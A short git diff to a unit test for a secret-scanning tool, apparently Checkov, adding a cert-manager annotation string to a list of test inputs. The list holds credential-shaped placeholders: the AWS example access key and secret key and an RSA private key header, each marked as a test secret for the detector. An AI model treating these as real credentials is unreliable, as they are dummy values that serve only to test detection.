by default continue diff --git a/tests/unit/test_secrets.py b/tests/unit/test_secrets.py index ba41f491c2f..9c330f867f4 100644 --- a/tests/unit/test_secrets.py +++ b/tests/unit/test_secrets.py @@ -11,7 +11,8 @@ def test_secrets(self): 'AKIAIOSFODNN7EXAMPLE', # checkov:skip=CKV_SECRET_2 test secret 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY', # checkov:skip=CKV_SECRET_6 test secret '-----BEGIN RSA PRIVATE KEY-----\n', # checkov:skip=CKV_SECRET_13 test secret - 'Hello from Bridgecrew' + 'Hello from Bridgecrew', + 'cert-manager.io/secret: org/repo', ] # check that no category checks all